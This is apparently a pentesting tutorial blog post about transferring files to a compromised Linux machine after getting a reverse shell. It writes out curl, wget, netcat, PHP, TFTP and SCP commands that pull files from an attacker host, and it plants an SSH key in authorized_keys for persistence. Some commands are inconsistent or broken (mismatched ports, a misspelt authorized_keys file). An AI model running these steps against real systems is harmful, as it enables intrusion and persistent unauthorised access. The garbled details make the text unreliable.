Get the Door - It's Transferring files on linux after getting a reverse shell.

Rahul Kumar
Nov 4, 2021
3 min read

Updated: Mar 3, 2022

Set Up Simple Python Webserver

For these examples, we use curl and wget commands to download a file from our web server. it is a simple way to install a web server. This command will make the whole folder, from where you subject the command, to be had on port 9999.

First, navigate to the folder you want to host on the network/internet.

python -m SimpleHTTPServer 9999

Curl

On the target device, you can download files using curl like this

curl -O http://192.168.0.101/file.txt

Wget

On the target device, you can download files using wget get like this

wget 192.168.1.102:9999/file.txt

Netcat

One of the ways to transfer files between devices is by using Netcat.

If you don't have an interactive shell it would be risky to begin listening on a port, since it might be that the attacking machine is unable to attach a connection to your machine port. So you're left with nothing and can't do ctr-c because it will kill your session on the target machine.

So rather you may join from the target device like this.

nc -lvp 4444 < file

On attacking device:

nc 192.168.185.103 1234 > file

You can also do the Risky way like this.

So on the target device, we run NC like this:

nc -lvp 1234 > enum.sh

And on the attacking device we send the file like this:

nc 192.168.185.103 < enum.sh

Sometimes you received this error:

This is nc from the netcat-openbsd package. An alternative nc is available

Just run this command instead:

nc -l 1234 > file.sh

With PHP

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.185.103/file', 'r')); ?>" > down2.php

Ftp

If you have access to an FTP client you can use that but Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted.

Connect to the FTP client using Username And password.

ftp TargetIPAddress

navigate to the desired directory on the FTP server where to upload a file

put c:\files\file1.txt

where "c:\files\file1.txt" is your file Path.

Tftp

On some machines, we do not have access to NC and wget or curl. But we might have access to TFTP. Some versions of TFTP can be used to download files remotely, like this

$ tftp 192.168.69.101
tftp> get yourfile.txt

If you can't run it, for whatever reason, you can also adopt a different approach:

tftp 192.168.185.103 <<< "get shell7878.php shell7878.php"

SCP

Now we can copy files to a machine using SCP(WOW)

# Copy a file:
scp /path/to/source/file.ext username@192.168.69.101:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@192.168.69.101:/path/to/destination

More About SCP here

SSH - SCP

If you manage to upload a reverse-shell and obtain access to the machine you would possibly be ready to enter using ssh which could offer you a far better shell and more stability and every one the opposite features of SSH Like transferring files within the /home/user directory you'll be able to find the hidden

within the /home/user directory you'll find the hidden .ssh files by typing ls -la

Now Do this Two thing

1. Create a new keypair

	ssh-keygen -t rsa -C "your_email@example.com"

then you enter a name for the key.

Enter file in which to save the key (/root/.ssh/id_rsa):

MyKey Enter passphrase (empty for no passphrase): Enter same passphrase again:

This will create two files, one called MyKey and another called MyKey_pub. The file with the _pub is your public key. And the other key is your private key.

2. Add your public key to authorized_keys

Now you copy the content of MyKey_pub. On the compromised machine you go to ~/.ssh and then run add the public key to the file authorized_keys. Like this

echo "ssh-rsa SDF456SGD464gg6FSAASF424GJKX3XKQFT4er99s
/dhtiwp6b5fhsdh35vj96hf5jbas531ae5t4ng5+dsgh54wr4w45w/kZ4Vdv..." > authorized_key

Now Log in to the target machine from your host machine.

ssh -i MyKey user@192.168.69.103